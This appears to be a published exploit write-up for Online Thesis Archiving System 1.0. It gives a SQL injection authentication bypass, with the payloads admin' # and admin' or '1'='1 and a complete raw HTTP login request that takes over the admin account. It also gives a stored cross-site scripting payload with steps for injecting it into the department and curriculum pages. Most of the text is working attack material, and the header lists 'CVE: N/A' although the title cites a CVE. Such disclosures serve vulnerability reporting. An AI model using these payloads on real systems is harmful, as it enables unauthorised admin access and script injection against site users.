CVE-2021-45334: Online Thesis Archiving System 1.0 SQL Injection

# Exploit Title: Online Thesis Archiving System 1.0 - SQLi Authentication Bypass & Stored (XSS)# Exploit Author: Yehia Elghaly (YME)# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html# Version: Online Thesis Archiving System 1.0# Tested on: Windows, xampp# CVE: N/A- Description:SQLi Authentication BypassSQL Injection vulnerability exists in Online Thesis Archiving System 1.0 1.0. An admin account takeover exists with the payload: admin' # -  admin' or '1'='1PoC:POST /otas/admin/login.php HTTP/1.1Host: 192.168.113.130User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 35Origin: http://192.168.113.130DNT: 1Connection: closeReferer: http://192.168.113.130/otas/admin/login.phpCookie: PHPSESSID=0jsudph494kpt2a5jvbvdvsrscUpgrade-Insecure-Requests: 1username=admin' #&password=admin' #- Description: Stored Cross Site Scripting (XSS)Stored Cross Site Scripting (XSS) exists in Online Thesis Archiving System 1.0. Steps: 1- Go to (http://localhost/otas/admin/?page=departments) and (http://localhost/otas/admin/?page=curriculum)2- Add new (curriculum) or (department) 3- Insert your payload <script>("xssyf")</script>